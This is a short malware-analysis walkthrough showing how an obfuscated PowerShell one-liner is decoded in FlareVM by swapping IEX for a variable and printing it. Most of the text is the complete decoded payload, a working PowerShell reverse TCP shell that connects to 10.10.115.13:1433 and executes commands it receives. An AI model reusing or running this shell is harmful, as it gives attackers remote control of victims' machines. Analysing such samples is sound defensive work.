For this malware sample, we have an obfuscated powershell script that we are going to try and analyze in the FlareVM. To start things of, lets open the script using Visual Studio Code. Because this is a “one-liner” script, using Alt+Z will word wrap the code we are working with to make it more easily readable.
From the first look on what is in the script, there is a base64 string that will be stored copressed using the io.compression.deflatestream class into memory using the io.memoryStream class, two .net classes. After that, this string will get decompressed using another .net class called system.io.compression.compressionmode::decompress. All this will be passed on the second “part” of the script that is after the pipe at the end of it and will be used as an argument there.
What we can do now to get more information on what this piece of malicious script is doing, we can instead of “IEX” (invoke expression), pass all of the script into a variable and use powershell in order to see what it does in the console. In order to do this, remove the IEX and the 2 parentheses (the one after IEX and the one at the very end of the script) and then we copy what is left and pass it in a variable in powershell.
To view the variable created another cmdlet will be used, write-host $variableName. After executing this command, we get the full DE-obfuscated script.
$client = $null;
$stream = $null;
$buffer = $null;
$writer = $null;
$data = $null;
$result = $null;
try {
$ip = "10.10.115.13"
$port = 1433
$client = New-Object Net.Sockets.TcpClient($ip, $port);
$stream = $client.GetStream();
$buffer = New-Object Byte[] 1024;
$encoding = New-Object Text.AsciiEncoding;
$writer = New-Object IO.StreamWriter($stream);
$writer.AutoFlush = $true;
$bytes = 0;
do {
$writer.Write("PS>");
do {
$bytes = $stream.Read($buffer, 0, $buffer.Length);
if ($bytes -gt 0) {
$data = $data + $encoding.GetString($buffer, 0, $bytes);
}
} while ($stream.DataAvailable);
if ($bytes -gt 0) {
$data = $data.Trim();
if ($data.Length -gt 0) {
try {
$result = Invoke-Expression -Command $data 2>&1 | Out-String;
} catch {
$result = $_.Exception | Out-String;
}
Clear-Variable -Name "data";
$length = $result.Length;
if ($length -gt 0) {
$count = 0;
do {
if ($length -ge $buffer.Length) { $bytes = $buffer.Length; } else { $bytes = $length; }
$writer.Write($result.substring($count, $bytes));
$count += $bytes;
$length -= $bytes;
} while ($length -gt 0);
Clear-Variable -Name "result";
}
}
}
} while ($bytes -gt 0);
} catch {
$_.Exception.InnerException.Message;
} finally {
if ($writer -ne $null) {
$writer.Close();
$writer.Dispose();
Clear-Variable -Name "writer";
}
if ($stream -ne $null) {
$stream.Close();
$stream.Dispose();
Clear-Variable -Name "stream";
}
if ($client -ne $null) {
$client.Close();
$client.Dispose();
Clear-Variable -Name "client";
}
if ($buffer -ne $null) {
$buffer.Clear();
Clear-Variable -Name "buffer";
}
if ($result -ne $null) {
Clear-Variable -Name "result";
}
if ($data -ne $null) {
Clear-Variable -Name "data";
}
[System.GC]::Collect();
}
Now that there is something more readable to work with, its time to understand what it does and if it has malicious intent or not. It looks to be a basic Powershell ReverseTCP shell. Calling to a specific IP (probably a C&C server) on a specific port (1433).